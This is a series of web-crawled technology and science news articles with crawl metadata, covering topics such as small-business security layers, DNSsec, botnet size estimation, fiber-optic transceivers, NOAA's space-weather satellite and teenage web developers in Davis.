A heightened security awareness and an increase in ecommerce have led more users than ever to use encryption to protect against third-party snooping. Paradoxically, this has resulted in lower visibility of network traffic at a time when more sophisticated malware varieties are resorting to encryption in order to conceal themselves from a casual inspection.
2. Virtual Private Network
Employees who need to access company resources from unsecured locations such as public Wi-Fi hotspots are a particularly vulnerable group. Such workers will be well served by a virtual private network (VPN) connection in order to protect the confidentiality of their network access. A VPN channels all network traffic through an encrypted tunnel back to the trusted corporate network.
As a downside, a VPN can be complex for a small business to deploy, and is costly to support due to the overheads of authentication, processing and bandwidth. Moreover, it is also vulnerable to the theft of physical authentication tokens -- or authentication technology, as was the case with the compromise of RSA's SecurID technology last year. Finally, stolen and lost company laptops with preconfigured VPN settings can become potential gateways for unauthorized access.
3. IDS and IPS
An intrusion detection system (IDS) is a network-centric strategy that involves monitoring traffic for suspicious activities that may indicate that the corporate network has been compromised. On its simplest level, this may entail the detection of port scans originating from within the network or excessive attempts to log into a server. The former could be indicative of a compromised host being used to perform initial reconnaissance, while the latter could well be a brute-force attempt in progress. On more advanced network switches, IDS monitoring of network traffic may be enabled by port mirroring, or via the use of passive network taps.
Then an intrusion prevention system (IPS) is usually deployed in-line in order to actively prevent or block intrusions as they are detected. A specific IP address could be automatically blocked off, with an alarm sent to an administrator.
4. Malware Detection
The cat-and-mouse game of malware detection is very much a linchpin of the $22.9 billion enterprise security software market projected for 2012. Malware scanning performed on client devices relies on the processing capabilities of individual devices to check for threats. Business-centric versions typically include some form of central management used to push out new definition updates and implement simple security policies. Malware products specifically optimized for servers are also available, though they are not particularly popular, as businesses are understandably loathe to deploy anything that saps the processing cycles of expensive server hardware.
Given that most malware infestations are a direct result of a user action, the typical anti-malware package has also evolved into comprehensive suites that attempt to offer protection against multiple threat vectors. This may include a component to scrutinize a URL link prior to launching it, or email and browser plug-ins that do the same to file attachments. In addition, anti-malware suites are increasingly bundled with a software-based firewall, spyware detection and even spam filtering.
Whitelisting is an anti-malware defense implemented on client devices much like traditional antivirus software. Instead of attempting to identify known malware, however, whitelisting only allows known files to be executed. This necessitates an initial baseline scan to construct a database of whitelisted applications, to which new applications can be added over time as they are installed.
Though promising, whitelisting has been plagued by various practical problems that have hindered its adoption in businesses. Situations may arise, for example, in which critical file dependencies were not properly identified, resulting in application crashes or an improper installation, as they were prevented from loading. Also, whitelisting may be less useful against exploits that leverage the use of specially created documents or other non-executable files. Finally, employees who are in a hurry may simply disregard warnings and opt to add everything, including malware, into their whitelist.
To be fair, whitelisting software has seen tremendous improvements over the years. Today, most whitelisting software applications will recognize commonly used applications upon installation and are hence capable of building an initial whitelist very quickly and with minimum interaction from users. It is important to ask question whether whitelisting software can coexist with traditional antivirus software. The answer varies, though some whitelisting products do advertise their compatibility with antivirus applications.
6. Spam Filtering
Though spam is not traditionally considered within the domain of computer security, the lines are getting blurred given the increasing number of spear phishing attacks used by hackers to sneak Trojan or zero-day malware into corporate workstations. In addition, there is also evidence to suggest that users who deal with a high volume of emails are more susceptible to being taken in by a phishing attempt. It is clearly in the interest of the IT department to filter out as many bogus email messages as possible.
There are many ways to deal with spam, which may entail channeling all incoming email messages through a specialized cloud service provider, a server-based spam filtering software, or dedicated anti-spam appliances deployed within the DMZ.
7. Keeping Software up to Date
Ensuring that software updates and security patches are kept up to date is widely acknowledged to be an important defense against security breaches. The reason is simple. Though vendors do not typically release the full details of new security flaws, the proffered guidelines and the release of the security patches are often sufficient for black hats to reverse engineer a particular vulnerability. Depending on the nature of the security flaw that is identified, an exploit could potentially be written in days.
This becomes a problem in larger SMBs, which may make use of wide range of software applications or in-house tools that depend on various third-party tools or codebases. It is hence not uncommon for new software updates or security patches to be overlooked, thus opening up a window of vulnerability. The increasing variety of software that is capable of updating itself over the Internet may somewhat alleviate this problem. However, it should be noted that automatic updating may not be a desirable behavior in mission-critical production environments. To that end, businesses need to implement appropriate processes to identify and test new updates in a timely manner.
8. Physical security
Physical security is a crucial factor that cannot be overstated. After all, given physical access, practically every security or network appliance can be reset to its factory default. In addition, unsecured Ethernet ports may also offer a direct line past the firewall and other perimeter defenses, though that access can be mitigated to an extent with managed switches configured to deny access to unrecognized MAC addresses. Another concern within server rooms is the theft of hard disk drives from hot-swappable bays of storage appliances or servers. Given how passwords files can be deciphered relatively easily from stolen storage devices, server closets or server rooms should be kept locked at all times, and access granted only to authorized staffers.
We have only touched on some of the most common aspects of security deployments. There are obviously many others, such as the importance of user education, independent security audits and the value of a good IT policy. The presence of comprehensive logging and auditing will also help greatly in identifying sources of a breach.
The important point here is that security is a multi-faceted topic that is constantly evolving. Small and mid-sized businesses need to ensure that they do not rely on a single mechanism to stay secure, and that they stay up to date on the latest security offerings available.
Paul Mah is a freelance writer and blogger who lives in Singapore. You can reach Paul at firstname.lastname@example.org and follow him on Twitter at @paulmah. | <urn:uuid:99a75337-887d-4dfb-8bd8-157e953d5597> | CC-MAIN-2017-04 | http://www.cio.com/article/2399075/security0/how-to-build-multiple-layers-of-security-for-your-small-business.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281263.12/warc/CC-MAIN-20170116095121-00265-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.94764 | 1,943 | 2.84375 | 3 |
NIST Proposes Tracking Cyber Attacks Via Web ServicesSoftware could track and then reconstruct cyber attacks carried out against web services to help organizations understand their vulnerabilities, according to scientists with the National Institute of Standards and Technology.
Developers could build a framework that could maintain transactional records among web services in order to recreate the scene of the crime in the aftermath of a cyber attack, scientists from the National Institute of Standards and Technology suggest in a new study.
More specifically, the researchers propose designing web services, which they label Forensic Web Services, that preserve evidence of attacks and then, using that data, reconstruct series of web service invocations that took place during the course of the attacks.
The system, the report's authors say, could work with any web services based on XML, Simple Object Access Protocol (SOAP) and related open standards.
The service would record transactions -- whenever they are invoked -- between pairs of services, and piece them together into pictures of the complex transactional scenarios that occurred during specific time periods, such as during an attack. The transaction records would be encrypted to maintain a level of security.
In order to work and for the records to be admissible as legal evidence, Forensic Web Services would be need to integrated with other web services, acting as a trusted, independent third party service. The data generated by the service's observation of transactions could be provided directly to forensic examiners and to customer of the Forensic Web Service, whose own web service was attacked.
With data in hand, examiners and victims could track down the insecure culprit, whether it was one of their own services or a third party. In addition, the researchers suggest, detailed evidence of malicious activity could impact the severity of punishment ultimately handed down to the culprits because the records would likely be used in court. | <urn:uuid:67422167-d679-4e07-a4aa-8fba77cbdf84> | CC-MAIN-2017-04 | http://www.darkreading.com/risk-management/nist-proposes-tracking-cyber-attacks-via-web-services/d/d-id/1090775 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00477-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.953811 | 364 | 2.703125 | 3 |
The National Oceanic and Atmospheric Administration (NOAA) on July 27 will begin monitoring the weather from space.
NOAA plans to launch the Deep Space Climate Observatory (DSCOVR), a satellite equipped with a Faraday Cup plasma sensor and a magnetometer that measures the severity of space weather storms. This satellite will collect more accurate data than previous technology has offered on space weather.
According to a recent news release from the U.S. Department of Commerce website, DSCOVR will be able to inform forecasters of geomagnetic storm warnings that could affect Earth. The satellite’s Faraday Cup plasma sensor measures the speed, density, and temperature of solar wind, while its magnetometer gauges the strength and direction of the solar wind magnetic field.
DSCOVR, NOAA’s first space weather satellite, will offer improved measurements and higher quality data that will alert weather experts of space storms approaching Earth. Although the sun is 93 million miles away, its weather activity can affect technological operations on Earth.
“Severe space weather can disrupt power grids, marine and aviation navigation, satellite operations, GPS systems and communication technologies,” said Tom Berger, director of NOAA’s Space Weather Prediction Center. “DSCOVR will allow us to deliver more timely, accurate, and actionable geomagnetic storm warnings, giving people time to prevent damage and disruption of important technological systems.”
DSCOVR’s data will allow forecasters to know up to an hour before a surge of particles created by solar storms hit Earth. Members of the public will be able to view this data as it is released online. The 47,000 people who subscribe to the Space Weather Prediction Center (SWPC) listserv will receive DSCOVR’s data and forecasts over email. | <urn:uuid:25478579-03f6-4c97-9830-79366bc95a31> | CC-MAIN-2017-04 | https://www.meritalk.com/articles/noaas-new-satellite-gathers-better-data-on-space-storms/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00477-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.913448 | 371 | 3.40625 | 3 |
Correlation rules are written to match specific events or sequences of events by using field references, comparison and match operators on the field contents, and operations on sets of events.
The Correlation Engine loads the rule definition and uses the rules to evaluate, filter, and store events in memory that meet the criteria specified by the rule. Depending on the rule definition, a correlation rule might fire according to several different criteria:
The value of one field or multiple fields
The comparison of an incoming event to past events
The number of occurrences of similar events within a defined time period
One or more subrules firing
One or more subrules firing in a particular order
This section provides a basic overview of how to build Correlation rules and the various parameters required to build a rule. | <urn:uuid:09397bc0-2b2c-4a9f-bf5b-ca94f28418ba> | CC-MAIN-2017-04 | https://www.netiq.com/documentation/sentinel70/s701_user/data/bgrabb4.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00477-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.895563 | 157 | 2.921875 | 3 |
OK, about a third of the way through this video I got lost, but if you're really into science stuff that seems cool, check out this video. Stanford University has posted an interview with Alfred Spormann, a professor of chemical engineering and of civil and environmental engineering at Stanford, discussing a project where they are using microbes that can turn electrical energy into pure methane.
An article explains a bit more:
"Researchers at both campuses are raising colonies of microorganisms, called methanogens, which have the remarkable ability to turn electrical energy into pure methane – the key ingredient in natural gas. The scientists' goal is to create large microbial factories that will transform clean electricity from solar, wind or nuclear power into renewable methane fuel and other valuable chemical compounds for industry."
The best part? Scientists from Pennsylvania State University are also assisting in this project, and we all know that it could help to have some good news coming out of that school.
Keith Shaw rounds up the best in geek video in his ITworld.tv blog. Follow Keith on Twitter at @shawkeith. For the latest IT news, analysis and how-tos, follow ITworld on Twitter, Facebook, and Google+.
Now watch: Star Wars/Gotye parody video proves how unhip I am 32-year-old talks to 12-year-old self via VHS Meet the YouTube Complaints Department Watch a water balloon pop in space Did this 1985 film coin the phrase 'information superhighway' and predict Siri? | <urn:uuid:b13a4946-1877-4efb-a439-eff80db2efeb> | CC-MAIN-2017-04 | http://www.itworld.com/article/2724558/consumer-tech-science/scientists-aim-to-create-gas-from-electricity.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282202.61/warc/CC-MAIN-20170116095122-00017-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.921582 | 308 | 2.875 | 3 |
The nuts and bolts of DNSsec
- By William Jackson
- Jul 25, 2008
The Domain Name System helps make a ubiquitous, global Internet practical by providing an infrastructure for mapping labels such as URLs and e-mail addresses to numerical IP addresses. Understandable addresses that can be remembered and convey information about the addressee, such as www.gcn.com, provide a friendly user interface for the Internet.
The original DNS specifications were finalized by 1983 in Internet Engineering Task Force RFC 882 and RFC 883. These have since been revised and replaced. Four Berkeley students created the first Unix implementation of DNS in 1984, which became the Berkeley Internet Name Domain (BIND) in 1985. This has become one of the most widely deployed name servers.
The DNS Security Extensions (DNSsec) are a response to vulnerabilities in DNS that make it possible for hackers to provide false information to a request, thus misinforming and misdirecting a client. The initial specification was published in 1997 and was replaced in 1999 with IETF RFC 2535. Further refinements have since been added.
With DNSsec, answers to requests are digitally signed to protect clients from forged DNS data. It provides:
- Origin authentication of DNS data.
- Data integrity.
- Authenticated denial of existence for an address that cannot be found.
Although digitally signed responses can be authenticated, they are not encrypted, and DNSsec does not provide confidentiality for the data.
William Jackson is a Maryland-based freelance writer. | <urn:uuid:12a50912-de75-4a68-8cc7-27159b79c43d> | CC-MAIN-2017-04 | https://gcn.com/Articles/2008/07/25/The-nuts-and-bolts-of-DNSsec.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00503-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.926631 | 309 | 3.390625 | 3 |
This section describes how to convert the previously discussed packed-decimal formats into text strings to print or display the information in a human readable form. Before converting the packed-decimal fields it should be determined if a conversion is necessary. The following list provides some basic guidelines.
1. When migrating an application (both data and COBOL programs for processing the data) from an IBM Mainframe to a Micro Focus and Windows environment a conversion is not necessary. Micro Focus COBOL supports the packed-decimal format.
2. When migrating an application (both data and COBOL programs for processing the data) from an IBM Mainframe to a Micro Focus and UNIX environment a conversion is not necessary. Micro Focus COBOL supports the packed-decimal format.
3. When migrating or transferring data from a COBOL oriented, IBM Mainframe or AS/400 environment to a non-COBOL oriented (Windows or UNIX) environment (i.e. ASCII/Text or excel spreadsheet) then a conversion will be required. This may require two conversion tasks. The packed-decimal fields (or data strings) will need to be converted to a zoned-decimal format (sign leading separate with an explicit decimal point should be considered depending on the target environment). The zoned-decimal format may then require a conversion from EBCDIC to ASCII.
4. When using the File Transfer Protocol (FTP) to transfer a data file between a mainframe and a Windows or UNIX environment it will be necessary to use the BINARY mode if the records contain packed-decimal fields. If a conversion between EBCDIC and ASCII is required it will need to be done after the transfer.
Joined: 28 Nov 2006 Posts: 305 Location: Deerfield IL
The "move" command does not convert types. Use the assignment statement instead. Assign a numeric variable to the packed variable then assign the character variable to the numeric. Note for the numeric variable if the number of decimal places is zero still do not leave this off. | <urn:uuid:699c05f4-1a52-4d6b-9d54-45e964c0bf35> | CC-MAIN-2017-04 | http://ibmmainframes.com/about31720.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280308.24/warc/CC-MAIN-20170116095120-00229-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.749652 | 425 | 3.078125 | 3 |
Have you ever plugged a sentence into a machine translation software and received a result that was so bad it blew your mind? The Bad Translator app can generate a perfect example of what can happen to a sentence when you run it through too many translations. I tried it out by inputting:
“I'd rather not deal with poorly translated sentences.”
Six translations later (from English to Bulgarian and back to English and into Korean, etc.), the translator spat out:
“I’d rather act with the translation of a sentence.”
Granted, there is no such thing as a perfect translation, and there’s a good reason for that. By its very nature, translation is a subjective activity. Language is fluid and open for interpretation. But we can take measures to get as many translations as accurate as possible.
There are various factors informing the quality of any given translation. One, of course, is skill in the language. Another is personal bias, which you can find almost everywhere, from theological opinions carrying over to Biblical translations to modifying news reports in a way that slants them differently than the source report.
Many biases and mistranslations are relatively harmless. But high-stakes agencies of the government can’t afford to misjudge their translations. If, for example, the government receives information about an emergency abroad, and there’s a mistranslation, relief efforts could be miscoordinated, and lives put at stake.
How Do We Assure Quality Translations?
Quality assurance is systemized in various layers of government. The FCC, which is in charge of all of the communication spectrum in the country, conducts ongoing tests to ensure that there’s no overlap between radio waves, TV stations, Wi-Fi, local broadcast and other frequencies. Based on those tests, they draw conclusions and put out new standards for each spectrum. In the same vein, the USDA has standards for food handling, the FAA for airplane safety and NIST for standards in the fields of science and technology.
Yet there are no cross-agency standards in translation, and there is no system of quality assurance for overall accurate translation. One reason is that translation is less objective than broadband or bacterial growth. Because language contains so many possibilities for interpretation, it is difficult to adopt black-and-white standards for the acceptance or rejection of content. There are, however, opportunities to use technology in novel ways to accomplish a different kind of quality assurance.
Standards for Translation
In order to create standards for translation, machine translation (MT) and humans must work together. Machine translation (MT) still doesn’t work well as a standalone technology. In order to generate accurate overall translations, human translators must be involved. Yet human translators have their own biases. You can’t yet trust a machine to generate the most accurate result. So how do you build real quality controls into your translation system?
In my experience, it helps to have several key components in place:
1. Measure translation quality. If you can’t measure a thing, chances are, you won’t have the foundation to improve it. In my work with the federal government, I’ve found that measurement is limited to the number of words translated each month. It would help greatly to know what’s trending, which people focused on what content, or what the volume of translations was in each area of focus. Such measurements help facilitate a better understanding of the process of their translations—and help users know what to improve.
2. Build a language model. A language model is anything that represents the properties of a language. Language models are ubiquitous, from Microsoft Word’s grammar checker to autocomplete on your smartphone. Building a language model for translation could involve identifying translators who consistently generate quality results, throwing their work into a big data bucket, and counting how many times a certain word or phrase translates into another. That way, as translators start to type, the translation platform can insert predictive text completion—autocomplete—for translations, offering suggestions based on the most likely next work or phrase to appear.
3. Use the cloud. Most ingrained translation management systems have no way to centralize data and run translation as a big data problem, because they’re not on the cloud. Without the cloud, it becomes difficult to measure and build language models, because there’s simply not enough data for the system to decipher quality results. If the government could focus on cloud-based translations, quality assurance and integrating standards would become a much easier process. Siloes of translation measurement could also be shared more easily in the cloud. If one agency has a solid set of standards for translating terminology, they could use the cloud to share it with another agency.
Once these pieces are in place, technology can be adapted to enable translators to, in aggregate, produce a higher-quality result. Bias and lack of skills will never be completely eliminated, but with the right technology, we can certainly control for them. | <urn:uuid:5bb4c58f-2e28-4974-9fe3-ebf05fdb775e> | CC-MAIN-2017-04 | http://www.computerworld.com/article/2474990/government-it/ridding-ourselves-of-poor-translations.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280319.10/warc/CC-MAIN-20170116095120-00073-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.947923 | 1,038 | 2.65625 | 3 |
New research underscores what any rational human being would conclude on their own: Inhaling toxic air over a long period of time is deadly. But how deadly is what's truly astonishing. The study by an international team of scientists, published in the Environmental Research Letters journal, concludes that more than 2 million people around the world die each year because of polluted air. "Our estimates make outdoor air pollution among the most important environmental risk factors for health," Jason West, an environmental science professor from the University of North Carolina and one of the study's many authors, said in a statement. The study team said the "increased concentrations of ozone and fine particulate matter since preindustrial times reflect increased emissions, but also contributions of past climate change." Researchers created chemistry-climate models for the years 2000 and 1850 (dawn of the industrial era) to determine the impact of outdoor air pollution across the globe. Here's what the team says in the paper's abstract:
Using simulated concentrations for 2000 and 1850 and concentration–response functions (CRFs), we estimate that, at present, 470 000 premature respiratory deaths are associated globally and annually with anthropogenic ozone, and 2.1 million deaths with anthropogenic PM2.5-related cardiopulmonary diseases (93%) and lung cancer (7%).
Air pollution tends to be worse in high-population areas such as China and India. Two studies released last week also painted a grim picture of air pollution's deadly impact around the world. In a study of lung cancer cases across Europe, researchers concluded that any kind of air pollution is dangerous. From NBC News:
Dr. Ole Raaschou-Nielsen of the Danish Cancer Society Research Center said they couldn’t find a “safe” level of air pollution. The more pollution, the higher the risk, even at legally accepted limits.The European team looked at data from 17 different studies involving more than 300,000 people in nine European countries. Over 13 years, 2,095 people developed lung cancer.
Researchers determined that an extra five micrograms of soot per cubic meter of air increased the average person's chances of getting lung cancer by 18%. The second study, published last week in the medical journal Lancet, explored the impact of air pollution on heart failure. Increasing the amount of carbon monoxide by only 1 part per million raises the risk of heart failure by 3.5%, while raising the level of particulate matter by 10 micrograms per cubic meter increases the risk by 2%. Now read this: | <urn:uuid:90bacef8-b5e6-4891-835a-dabf639ecf7a> | CC-MAIN-2017-04 | http://www.itworld.com/article/2707226/enterprise-software/air-pollution-s-deadly-toll--more-than-2-million-people-each-year.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279176.20/warc/CC-MAIN-20170116095119-00102-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.926706 | 513 | 3.0625 | 3 |
The main metric with which security researchers identify how effective and disruptive specific botnets are is the number of computers they consists of.
Estimating their size allows them to assess whether concentrating their efforts on the disruption of one is better than focusing on “attacking” another, and to estimate which resources they will have to dedicate to this task.
But measuring the size of a botnet once is not enough. It has to be done over and over again, as the number of zombie computers it consists of changes with each passing day. This continuous effort also allows researchers to see whether and in what measure their efforts have been successful.
In a recent blog post, Jose Nazario, senior manager of security research at Arbor Networks, gave insight into a number of measurement methodologies researchers use to effect that task.
Sinkholing botnets by identifying its C&C server and redirecting infected computers to another controlled by the researchers is a very popular technique at the present moment. Not only can they then count the number of unique IP addresses that connect to it in a certain period, but they can also sometimes identify whether there is more than one PC on one IP address.
Dark IP monitoring consists of a completely different approach. “This method takes large unused IP address blocks and then listens for traffic,” explains Nazario. “The collection system is able to fingerprint bots based on specific signs. This could include the exploit traffic or traffic to a specific TCP/IP service used. This then gives you some passive mechanism to watch the botnet and try to spread.”
A third methodology – counting infected hosts – is more direct than the previous ones, and is often employed by Microsoft as the company can dip into the reports sent by its AV solutions such as the Malicious Software Removal Tool. Still, only Microsoft can effectively use this method, as AV solutions by other vendors are not that widely and uniformly distributed around the world.
Crawling a peer-to-peer botnet in order to gather the peer list from every node and walk the botnet recursively is also a good and direct option, but in order to do it, researchers must know the P2P protocol it uses – and it must not be strongly encrypted.
Unfortunately, the effectiveness of each of these methodologies can be thwarted by a number of things.
ISPs could be directing affected computers to their own sinkholes to identify and help their own infected customers, so the sinkholes set up by the researchers don’t catch all the IPs. If a bot is offline, it won’t be contacting the sinkhole and will not, therefore, be counted.
Finally, the gathered IP addresses are not always equivalent to one affected computer. IP addresses for one machine can be changed multiple times per day, leading to an over count.
On the other hand, Network Address Translation (NAT) can account for significantly smaller numbers recorded, as in some parts of the network up to a hundred PCs share the same IP address.
Obviously, none of these measurement methodologies are perfect.
“We’re trying to identify the causes for the gaps in the methodologies (e.g. network vs host measurements) and provide stronger data by closing those gaps,” Nazario concludes.
“Based on this data, we also work globally to identify working strategies that effectively shut down botnets and drop infection rates. We then want to coordinate these efforts globally to lead to lower infections in each region.” | <urn:uuid:e350b5a6-5b25-4238-924c-fcb2360233cc> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2012/05/03/the-difficulties-in-sizing-up-botnets/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00496-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.95433 | 718 | 2.765625 | 3 |
Fiber connector types include SC and ST for 1Gb Fibre Channel, Gigabit Ethernet, ESCON, and FICON. A smaller form-factor GBIC, about the size of a networking RJ45 (Ethernet) connector, is the Small Form-factor (SFF); a Small Form-factor Pluggable (SFP) connector is used with 2Gb and 4Gb Fibre Channel, although some products utilize SFPs for 1Gb applications. SFF and SFP are somtiimes referred to as LC connectors. Fibre Channel supports copper and fiber optic interfaces (most implementations are now optical). Fibre Channel utilizes various cable types, including 62.5 and 50 um (micron) Multi-Mode Fiber (MMF) and 9 um Single-Mode Fiber (SMF). Trunk cable is used to physically combine multiple cable strands into a single cable bunch that fans out at each end or has a special connector to attch a fan-out cable (e.g., MTP cable). Some common fiber optic connector types are shown as below. Duplex connectors have two connections attached to each other (pair), where as simplex has individual connectors.
This figure includes LC, SC, simplex (single connector), and duplex (a pair of fiber connects). Two other fiber optic connector types are ESCON Duplex and MIX (FDDI), which are used for ESCON and FDDI configurations, respectively. Various cable and jumper configurations are available, including SC to SC, SC to LC, LC to LC, SC to ST, Simplex, Duplex, and LC to MT-RJ, to name a few. There are also mode conditioners, which enable different types of fiber optic cabling to coexit, for example, using existing ESCOM cables for 1Gb FICON. Connectors, cables, and other accessory optic items are available from a variety of different sources.
Caution: Fiber Optic Care and Handing: Fiber optic cable is relatively flexible compared with traditional bulky storage interfaces and even Unshielded Twisted Pair (UTP) copper cabling used with networking. However, fiber optic cabling is sensitive to bending and sharp turns as well as dust and dirt. Keep your fiber optic connectors clean and if you plan on making many changes resulting in unplugging and replugging connectors, invest in a quality cleaning kit. As part of managing your fiber-optic infrastructure avoid sharp bends and twists in your cabling to prevent damage to the core. Cable bend radius guides can be used to help protect cabling.
Fibre Channel and Ethernet borrow and leverage technologies from each other, particularly at the physical layer. 1Gb Ethernet utilizes fiber optic transmission (8B/10B encoding) technology borrowed from Fibre Channel, with Ethernet operating at a faster clock rate. A 1Gb Ethernet has a slight wire speed theoretical bandwidth advantage of 1.25 Gbps compared with 1.0625 Gbps Fibre Channel, which is about 150 Mbps difference. Some Fibre Channel and Ethernet 1Gb GBICs are interchangeable and support dual clock rates; however, this varies by manufacturer and vendor-supported configurations. At 10Gb Fibre Channel borrows from Ethernet using a common encoding and transmission scheme, including virtual lanes and common coding (65/66B).
Similar to fiber optic cabling having different types for short- and long- haul applications, fiber optic transceivers also have different characteristics and capabilities. Here is a table that shows some common fiber optic transceivers and their characteristics, including cable type and connector type along with supported distance. Fiber optic transceivers include Gigabit Interface Converter (GBIC) for 1Gb, SFPs for 100Mb to 4Gb, and eXtended Fiber plug (XFP) and SFP Plus (SFP+) for 10Gb applications. Note that some fiber optic transceivers, including GBIC modules, SFP modules, SFP+ modules and XFP modules are interchangeable between Fibre Channel and Ethernet devices; however, consult the manufacturers’ material for specific guidelines and supported configurations. Media interface adapters (MIA) can be used to convert from copper electrical to optic.
Transceivers are also used on DWDM technology for sending and transmitting light over various distances and for using different wavelengths. For diagnostic, monitoring, and test purposes there are also loop-back transceivers that simply take the transmit signal and loop it back to the receiver. There are also snoop transceivers, which have an extra connection pair for attachment of optical test tools, sniffers, analyzers, and performance probes. Snoop GBICs bleed off a small amount of the light source and send it to the extra monitoring port for use by diagnostic and monitoring tools. This allows fiber optic and interface analyzers to look at and collect traffic information for diagnostic and troubleshooting applications. Performance analyzers and probes can also be attached to these ports to collect detailed session-level statistics at the network interface up to the protocol layer. This would include SCSI, IP, VI, and FICON reads, writes, I/O size, source, destination, reponse time, signal and synchronization loss, and other pertinent data to aid management, storage resource management, and capacity planning. Another technique for trapping into a fiber optic stream without using snoop GBICs and SFPs is to use a “Y” splitter cable, sometimes called a pigtail cable or splitter device, which is essentially a “Y” in s small connector box.
An emerging trend is to have extra ports, called mirrored ports and spanning ports, available similar to Ethernet switches. Another emerging trend is to have the information from the port itself sent in-band to management software. Analyzers are good for collecting very detailed state information with some retention capabilities, while probes and sniffers tend to take a higher-level view, provding analysis capability, long-term retention of data, and reporting/display capabilities. Depending on your specific needs, you may need both, one or the other, or perhaps neither. From an educational standpoint, it certainly helps to have at least some exposure and training, even if it is a demonstration regarding what these tools can do and how they can be used to help you better understand your storage networking environment and troubleshoot things.
There is another specialized type of transceiver, which is a wavelength (lambda), specific GBIC or SFP, sometimes called CWDM GBIC and CWDM SFP. Regular transceivers transmit light at a common wavelength or light level. By using CWDM technonlogy different transceivers can have different wavelengths assigned to them, for example, at 20 um ITU grid spacing. Each wavelength must be aligned with its correspongding wavelength or the transceivers will not communicate. By using Optical Add-Drop Multiplexer (OADM) devices the various wavelengths are combined to creat a multiplex light source and transmitted over a single-mode fiber optic cabling. The light is demultiplexed at the far end back into the individual wavelengths and sent to the wavelength-specific transceiver.
The figure below shows an example of wavelength-specific transceivers based upon CWDM technology with an ITU grid spacing of 20 nm and an OADM. In this example a server on the left has a wavelength-specific transceiver operating at 1470 nm spacing, that is, multiplex with other wavelengths for long-haul transmission using SMF optical cabling. ON the right, we see that the combined light source is demultiplexed by the OADM and the appropriate wavelength is sent via fiber optic cable to the storage on the right. In this example there is a jumper cable (fiber patch cable) between the server and the OADM on the left, an SMF cable between the OADM on the left and right, and a jumper cable between the OADM on the right and the storage device.
Another example, based on the same figure, would be to introduce a switch (Ethernet, Fibre Channel, FICON) that servers and other devices would attach to on both sides. The switches would then connect to an OADM device using the wavelength-specific transceivers to multiplex their signals over a common SMF fiber optic cable. Consequently, multiplexing can be used to combine Fibre Channel, FICON for storage access, and Ethernet for server access and clustering hearbeat over a common fiber optic cable for long-distance applications. | <urn:uuid:61baf7a8-1d96-4fe9-951f-a4dfa27eb5e4> | CC-MAIN-2017-04 | http://www.fs.com/blog/fiber-optic-connectors-and-transceivers.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279189.36/warc/CC-MAIN-20170116095119-00524-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.915723 | 1,764 | 2.546875 | 3 |
The entrepreneurial spirit is alive and well in the Junior and Senior High School students of Davis, Calif. Many of these students are engaged in creating Internet Web pages, and they are making money for their efforts.
Davis is home to the University of California at Davis. The city is full of bicycles, education, and computer technology and offers an ideal environment for developing the next generation of technological leaders.
This pleasant college town is another cul-de-sac on the information highway that is tucked away behind a router. The Davis Community Network (DCN), , serves as the Internet launch point for many of the city's young techies.
The ages of these Web wizards range from 13 to more than 18 years. One, who is too young to drive, has equipped his bicycle with a cellular phone. Because of their age, many bill themselves as consultants. This allows them to circumvent the archaic labor laws associated with employing children under age 16. In this situation, the labor laws have not kept pace with the advancements in technology. Writing HTML code for Web pages does not require a sweat-shop environment for these young workers. Working as consultants allows them to be paid for their efforts.
These youthful entrepreneurs command fees as high as $1,000 to set up a Web page. Their customers include various departments at UC Davis and businesses located on the bustling Davis Virtual Market (DVM) section of DCN. DVM is a very busy area, sustaining 308,454 hits last June.
Graham J.M. Freeman, a senior at Davis High School, develops Web pages and volunteers as a member of the DCN Web team. He learned to write Pascal code at Davis High School under the tutelage of computer teacher Janet Meizel. When the Internet explosion came along, he taught himself to write HyperText Markup Language (HTML) code. These ASCII instructions are used by Web browsers for displaying pages.
In the same fashion as other inquisitive programmers, he obtained and dissected existing HTML files. "If I see something I like, I view the source and try to determine how I can adapt that code without actually copying it," said Freeman.
For Freeman, content takes precedence over graphics. His pages are designed to be functional with all the popular browsers and platforms. The pages must be pleasing under Netscape, Explorer and Mosaic. Both Windows 3.x and Windows 95 platforms are used to test newly developed pages. Users of the text-only Lynx browser are also accommodated by Freeman's pages. He said, "I don't really rely too much on graphics. Eye candy has its place, but I personally don't want it."
Freeman noted that many personal Web pages are lacking in content, even his own. "I have a cat. I breathe," he joked. However, content was uppermost in his mind when he created a Web page for his mother's political campaign. During the campaign, her Web page received more than 30 hits per day. He noted this was low compared to commercial pages, but good for a local page.
In keeping with his preference for content, Freeman avoids gizmos and gadgets such as counters and animation. "Unobtrusive animations don't bother me. The ones that do bother me are those that keep reloading. The stop light goes on and off constantly," he said.
Counters are devices that keep track of the number of visitors to a given page. Counter programs usually reside on a remote server elsewhere on the Internet. When a user visits a counter-controlled page, a signal is sent to the counter server. The page count is updated, and a graphics image of an odometer showing the number of hits is sent back to the visited page and displayed. This lag time is often the reason the counter doesn't display until long after the page
has finished loading.
